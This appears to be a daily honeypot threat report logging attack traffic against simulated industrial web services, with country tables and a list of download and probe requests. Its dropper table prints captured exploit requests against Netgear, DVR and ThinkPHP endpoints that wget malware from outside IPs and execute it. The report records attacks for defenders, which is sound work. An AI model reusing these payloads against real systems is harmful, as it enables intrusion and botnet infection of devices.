Daily Report: 2025-03-31#
Interaction report on http service of various honeypot around the world.
ot_simplified_report#
Simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
| source_country | targeted_country |
|---|---|
| DE | Germany |
| SC | Singapore |
| SG | Singapore |
| MY | Australia |
| GB | Dubai |
| US | Dubai |
| GB | Georgia |
| CN | Georgia |
| MY | |
| CA | |
| US |
botnet_dropper_behaviour#
List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code).
| remote_addr | request |
|---|---|
| 27.43.204.223 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
| 223.109.64.180 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://102.33.18.208:37747/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
| 141.98.11.210 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20arm7 HTTP/1.1 |
| 220.179.1.88 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
| 1.170.222.168 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
| 175.182.207.63 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
| 117.135.239.172 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
| 123.240.58.26 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
| 140.207.30.37 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
| 106.105.231.176 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
| 14.103.164.141 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://213.209.129.92/Yboats.x86 -O /tmp/.YBot; chmod 777 /tmp/.YBot; /tmp/.YBot thinkphp.selfrep’ HTTP/1.1 |
| 49.143.97.135 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
| 58.242.106.187 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
| 186.29.199.182 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
| 123.241.190.219 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
| 123.195.84.162 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
| 36.226.193.153 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
| 1.165.21.84 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
request#
List of requests of the day that have never been detected, other requests that have already been detected and archived in the request database..
| number_of_occurence | request | |
|---|---|---|
| 15 | 16 | GET /kai.html HTTP/1.1 |
| 214 | 5 | GET /tt/mips HTTP/1.1 |
| 215 | 5 | GET /vv/arc HTTP/1.1 |
| 216 | 5 | GET /vv/riscv32 HTTP/1.1 |
| 217 | 5 | GET /vv/sh4 HTTP/1.1 |
| 218 | 5 | GET /tt/sh4 HTTP/1.1 |
| 219 | 5 | GET /vv/mips HTTP/1.1 |
| 220 | 5 | GET /ee/armv4eb HTTP/1.1 |
| 221 | 5 | GET /ee/armv5l HTTP/1.1 |
| 222 | 5 | GET /x86_32.nn HTTP/1.1 |
| 223 | 5 | GET /sparc.nn HTTP/1.1 |
| 224 | 5 | GET /mipsel.nn HTTP/1.1 |
| 225 | 5 | GET /arm.nn HTTP/1.1 |
| 226 | 5 | GET /t/mips HTTP/1.1 |
| 355 | 5 | GET /splarm HTTP/1.1 |
| 369 | 5 | GET /splsh4 HTTP/1.1 |
| 370 | 5 | GET /splppc HTTP/1.1 |
| 371 | 5 | GET /LjEZs/uYtea.spc HTTP/1.1 |
| 372 | 5 | GET /LjEZs/uYtea.arm HTTP/1.1 |
| 373 | 5 | GET /jklspc HTTP/1.1 |
| 390 | 5 | GET /tsh4 HTTP/1.1 |
| 391 | 5 | GET /x86_64 HTTP/1.1 |
| 394 | 4 | GET /debug.dbg HTTP/1.1 |
| 396 | 4 | GET /hidakibest.arm5 HTTP/1.1 |
| 397 | 4 | GET /yakuza.mips HTTP/1.1 |
| 399 | 4 | GET /vv/powerpc HTTP/1.1 |
| 401 | 4 | GET /tt/i686 HTTP/1.1 |
| 402 | 4 | GET /jklx86 HTTP/1.1 |
| 403 | 4 | GET /nabarm6 HTTP/1.1 |
| 404 | 4 | GET /mips.nn HTTP/1.1 |
| 407 | 4 | GET /x86 HTTP/1.1 |
| 409 | 4 | GET /LjEZs/uYtea.x86 HTTP/1.1 |
| 411 | 3 | GET /tt/powerpc HTTP/1.1 |
| 414 | 3 | GET /hidakibest.sparc HTTP/1.1 |
| 416 | 3 | GET /hidakibest.arm4 HTTP/1.1 |
| 417 | 3 | GET /tt/mipsel HTTP/1.1 |
| 418 | 3 | GET /x86_64.nn HTTP/1.1 |
| 419 | 3 | GET /vv/sparc HTTP/1.1 |
| 423 | 3 | GET /tt/mips64 HTTP/1.1 |
| 424 | 3 | GET /tt/sparc HTTP/1.1 |
| 425 | 3 | GET /hidakibest.mips HTTP/1.1 |
| 426 | 3 | GET /hidakibest.mpsl HTTP/1.1 |
| 427 | 3 | GET /hidakibest.arm6 HTTP/1.1 |
| 428 | 3 | GET /tt/armv5l HTTP/1.1 |
| 429 | 3 | GET /arm5.nn HTTP/1.1 |
| 433 | 3 | GET /vv/mips64 HTTP/1.1 |
| 434 | 3 | GET /tmips HTTP/1.1 |
| 435 | 3 | GET /vv/armv4l HTTP/1.1 |
| 439 | 3 | GET /m-6.8-k.Sakura HTTP/1.1 |
| 442 | 3 | GET /yakuza.x86 HTTP/1.1 |
| 443 | 3 | GET /yakuza.arm6 HTTP/1.1 |
| 451 | 3 | GET /vv/armv5l HTTP/1.1 |
| 453 | 3 | GET /powerpc.nn HTTP/1.1 |
| 454 | 3 | GET /nabarm7 HTTP/1.1 |
| 455 | 3 | GET /splarm5 HTTP/1.1 |
| 456 | 3 | GET /splmpsl HTTP/1.1 |
| 457 | 3 | GET /LjEZs/uYtea.x86_64 HTTP/1.1 |
| 458 | 3 | GET /LjEZs/uYtea.arc HTTP/1.1 |
| 459 | 3 | GET /aarch64 HTTP/1.1 |
| 460 | 3 | GET /splm68k HTTP/1.1 |
| 462 | 3 | GET /hidakibest.x86 HTTP/1.1 |
| 464 | 3 | GET /vv/mipsel HTTP/1.1 |
| 465 | 3 | GET /vv/i686 HTTP/1.1 |
| 466 | 3 | GET /tt/riscv32 HTTP/1.1 |
| 467 | 3 | GET /tarm5 HTTP/1.1 |
| 469 | 3 | GET /hiddenbin/boatnet.spc HTTP/1.1 |
| 470 | 3 | GET /main_mips HTTP/1.1 |
| 471 | 3 | GET /main_arm6 HTTP/1.1 |
| 472 | 3 | GET /t/arm7 HTTP/1.1 |
| 473 | 3 | GET /main_x86_64 HTTP/1.1 |
| 475 | 2 | GET /tt/mipsel64 HTTP/1.1 |
| 480 | 2 | GET /tt/arc HTTP/1.1 |
| 481 | 2 | GET /tt/armv4l HTTP/1.1 |
| 482 | 2 | GET /tt/armv6l HTTP/1.1 |
| 483 | 2 | GET /vv/armv7l HTTP/1.1 |
| 484 | 2 | GET /ee/armv6l HTTP/1.1 |
| 489 | 2 | GET /tarm HTTP/1.1 |
| 490 | 2 | GET /tmpsl HTTP/1.1 |
| 491 | 2 | GET /tarm7 HTTP/1.1 |
| 495 | 2 | GET /vv/armv6l HTTP/1.1 |
| 496 | 2 | GET /vv/armv4eb HTTP/1.1 |
| 497 | 2 | GET /ee/armv4l HTTP/1.1 |
| 498 | 2 | GET /ee/armv7l HTTP/1.1 |
| 499 | 2 | GET /tt/armv7l HTTP/1.1 |
| 500 | 2 | GET /tt/armv4eb HTTP/1.1 |
| 501 | 2 | GET /t/arm5 HTTP/1.1 |
| 502 | 2 | GET /t/aarch64 HTTP/1.1 |
| 503 | 2 | GET /sh4 HTTP/1.1 |
| 509 | 2 | GET /mipsel HTTP/1.1 |
| 510 | 2 | GET /dss HTTP/1.1 |
| 512 | 2 | GET /hidakibest.ppc HTTP/1.1 |
| 513 | 2 | GET /yakuza.arm4 HTTP/1.1 |
| 514 | 2 | GET /yakuza.i586 HTTP/1.1 |
| 515 | 2 | GET /Mozi.m HTTP/1.1 |
| 516 | 2 | GET /sparc HTTP/1.1 |
| 517 | 2 | GET /yakuza.m68k HTTP/1.1 |
| 520 | 2 | GET /yakuza.ppc HTTP/1.1 |
| 521 | 2 | GET /sh4.nn HTTP/1.1 |
| 523 | 2 | GET /arm6 HTTP/1.1 |
| 525 | 2 | GET /arm5 HTTP/1.1 |
| 526 | 2 | GET /m68k HTTP/1.1 |
| 527 | 2 | GET /i686 HTTP/1.1 |
| 529 | 2 | GET /arm7 HTTP/1.1 |
| 530 | 2 | GET /arc HTTP/1.1 |
| 531 | 2 | GET /arm HTTP/1.1 |
| 532 | 2 | GET /spc HTTP/1.1 |
| 533 | 2 | GET /jklppc HTTP/1.1 |
| 534 | 2 | GET /splmips HTTP/1.1 |
| 535 | 2 | GET /nabarm5 HTTP/1.1 |
| 536 | 2 | GET /jklsh4 HTTP/1.1 |
| 537 | 2 | GET /nabmips HTTP/1.1 |
| 538 | 2 | GET /LjEZs/uYtea.arm5 HTTP/1.1 |
| 539 | 2 | GET /main_sh4 HTTP/1.1 |
| 540 | 2 | GET /main_arm7 HTTP/1.1 |
| 541 | 2 | GET /main_ppc HTTP/1.1 |
| 542 | 2 | GET /LjEZs/uYtea.sh4 HTTP/1.1 |
| 543 | 2 | GET /LjEZs/uYtea.mpsl HTTP/1.1 |
| 544 | 2 | GET /LjEZs/uYtea.ppc HTTP/1.1 |
| 545 | 2 | GET /LjEZs/uYtea.arm6 HTTP/1.1 |
| 546 | 2 | GET /LjEZs/uYtea.m68k HTTP/1.1 |
| 547 | 2 | GET /LjEZs/uYtea.arm7 HTTP/1.1 |
| 548 | 2 | GET /bins/arc HTTP/1.1 |
| 549 | 2 | GET /bins/arm6 HTTP/1.1 |
| 550 | 2 | GET /bins/mpsl HTTP/1.1 |
| 551 | 2 | GET /bins/ppc HTTP/1.1 |
| 552 | 2 | GET /miner HTTP/1.1 |
| 553 | 2 | GET /gif HTTP/1.1 |
| 554 | 2 | GET /main_x86 HTTP/1.1 |
| 555 | 2 | GET /main_m68k HTTP/1.1 |
| 556 | 2 | GET /main_arm HTTP/1.1 |
| 557 | 2 | GET /main_arm5 HTTP/1.1 |
| 558 | 2 | GET /zd/arm5 HTTP/1.1 |
| 559 | 2 | GET /zd/ppc HTTP/1.1 |
| 560 | 2 | GET /t/mpsl HTTP/1.1 |
| 561 | 2 | GET /ppc HTTP/1.1 |
| 562 | 2 | GET /t/sh4 HTTP/1.1 |
| 563 | 2 | GET /t/arm HTTP/1.1 |
| 564 | 2 | GET /t/arm6 HTTP/1.1 |
| 565 | 2 | GET /zd/spc HTTP/1.1 |
| 566 | 2 | GET /zd/arm6 HTTP/1.1 |
| 567 | 2 | GET /zd/arm HTTP/1.1 |
| 568 | 2 | GET /zd/mpsl HTTP/1.1 |
| 570 | 2 | GET /sshd HTTP/1.1 |
| 572 | 2 | GET /bins/m68k HTTP/1.1 |
| 575 | 2 | GET /i HTTP/1.1 |
| 576 | 2 | GET /bin.sh HTTP/1.1 |
| 588 | 2 | GET /old.env HTTP/1.1 |
| 593 | 2 | GET /zd/sh4 HTTP/1.1 |
| 609 | 2 | GET /App/.env HTTP/1.1 |
| 619 | 2 | GET /hiddenbin/boatnet.m68k HTTP/1.1 |
| 631 | 1 | GET /NmapUpperCheck1743379778 HTTP/1.1 |
| 632 | 1 | GET /bzK5 HTTP/1.1 |
| 633 | 1 | GET /rest/applinks/1.0/manifest HTTP/1.1 |
| 634 | 1 | GET /Nmap/folder/check1743379778 HTTP/1.1 |
| 673 | 1 | \xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4f\xB2M\xD8n\xCD)\xB5\x05\x02\x00\x01\x00\x00\xA1\xAA |
| 688 | 1 | GET /metadata HTTP/1.1 |
| 689 | 1 | GET /baseR2/metadata HTTP/1.1 |
| 690 | 1 | GET /baseDstu3/metadata HTTP/1.1 |
| 691 | 1 | GET /baseDstu2/metadata HTTP/1.1 |
| 692 | 1 | GET /baseR5/metadata HTTP/1.1 |
| 693 | 1 | \xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB47\xB7\xC0-\xC7\xAF\xC9\xFB\x05\x02\x00\x01\x00\x00\xA1\xAA |
| 701 | 1 | \xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\x0F+\xA0\x8F\xC2\x03\xB8/\x05\x02\x00\x01\x00\x00\xA1\xAA |
| 715 | 1 | GET /baseR4/metadata HTTP/1.1 |
| 716 | 1 | GET /r2/metadata HTTP/1.1 |
| 717 | 1 | GET /r4/metadata HTTP/1.1 |
| 718 | 1 | GET /baseR3/metadata HTTP/1.1 |
| 719 | 1 | GET /fhir/metadata HTTP/1.1 |
| 726 | 1 | GET /r3/metadata HTTP/1.1 |
| 727 | 1 | GET /r5/metadata HTTP/1.1 |
| 728 | 1 | GET /fhir-server/api/v4/metadata HTTP/1.1 |
| 730 | 1 | \xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\xD9\xF6L\xC4\xCE$\x90\xDC\x05\x02\x00\x01\x00\x00\xA1\xAA |
| 752 | 1 | GET /zd/arc HTTP/1.1 |
| 753 | 1 | GET /zd/arm7 HTTP/1.1 |
| 754 | 1 | GET /zd/mips HTTP/1.1 |
| 755 | 1 | GET /zd/m68k HTTP/1.1 |
| 756 | 1 | GET /bins/sh4 HTTP/1.1 |
| 757 | 1 | GET /bins/arm7 HTTP/1.1 |
| 783 | 1 | GET /zd/i686 HTTP/1.1 |
| 795 | 1 | GET /bins/mips HTTP/1.1 |
| 796 | 1 | GET /bins/x86 HTTP/1.1 |
| 797 | 1 | GET /bins/spc HTTP/1.1 |
| 798 | 1 | GET /main_mpsl HTTP/1.1 |
| 799 | 1 | GET /zd/aarch64 HTTP/1.1 |
| 800 | 1 | GET /nabx86 HTTP/1.1 |
| 801 | 1 | GET /nabppc HTTP/1.1 |
| 802 | 1 | GET /nabm68k HTTP/1.1 |
| 803 | 1 | GET /splarm7 HTTP/1.1 |
| 804 | 1 | GET /nabmpsl HTTP/1.1 |
| 805 | 1 | GET /splx86 HTTP/1.1 |
| 806 | 1 | GET /jklm68k HTTP/1.1 |
| 807 | 1 | GET /zerarm7 HTTP/1.1 |
| 809 | 1 | GET /bins/arm5 HTTP/1.1 |
| 810 | 1 | GET /bins/arm HTTP/1.1 |
| 832 | 1 | GET /NmapUpperCheck1743418291 HTTP/1.1 |
| 843 | 1 | GET /nabarm HTTP/1.1 |
| 844 | 1 | GET /mips HTTP/1.1 |
| 845 | 1 | GET /mpsl HTTP/1.1 |
| 846 | 1 | GET /LjEZs/uYtea.mips HTTP/1.1 |
| 847 | 1 | GET /nabsh4 HTTP/1.1 |
| 848 | 1 | GET /arm7.nn HTTP/1.1 |
| 863 | 1 | GET /1Wsa HTTP/1.1 |
| 867 | 1 | GET /Nmap/folder/check1743418291 HTTP/1.1 |
| 878 | 1 | GET /t/ppc HTTP/1.1 |
| 894 | 1 | GET /nmaplowercheck1743418291 HTTP/1.1 |
| 913 | 1 | GET /nmaplowercheck1743379778 HTTP/1.1 |
| 928 | 1 | CNXN\x00\x00\x00\x01\x00\x00\x04\x00\x1B\x00\x00\x00M |
country_iso_code#
List of country names and number of requests received by IPs located in these countries.
| number_of_occurence | country_iso_code | |
|---|---|---|
| 0 | 1639 | NL |
| 1 | 659 | GB |
| 2 | 451 | BG |
| 3 | 336 | MY |
| 4 | 329 | US |
| 5 | 249 | DE |
| 6 | 233 | SC |
| 7 | 204 | SG |
| 8 | 132 | HK |
| 9 | 111 | TW |
| 10 | 93 | CN |
| 11 | 72 | PL |
| 12 | 45 | IR |
| 13 | 27 | CA |
| 14 | 18 | NG |
| 15 | 11 | RU |
| 16 | 9 | BE |
| 17 | 8 | BR |
| 18 | 8 | IN |
| 19 | 7 | JP |
| 20 | 7 | MA |
| 21 | 6 | FR |
| 22 | 6 | IT |
| 23 | 5 | PT |
| 24 | 4 | TR |
| 25 | 4 | KR |
| 26 | 4 | LT |
| 27 | 4 | SA |
| 28 | 4 | ID |
| 29 | 3 | GH |
| 30 | 3 | AO |
| 31 | 2 | MC |
| 32 | 2 | AZ |
| 33 | 2 | CH |
| 34 | 2 | UA |
| 35 | 2 | CZ |
| 36 | 2 | CO |
| 37 | 1 | AU |
| 38 | 1 | SE |
| 39 | 1 | PA |
| 40 | 1 | ES |
| 41 | 1 | GR |
| 42 | 1 | AR |
| 43 | 1 | MX |
| 44 | 1 | VN |
| 45 | 1 | AE |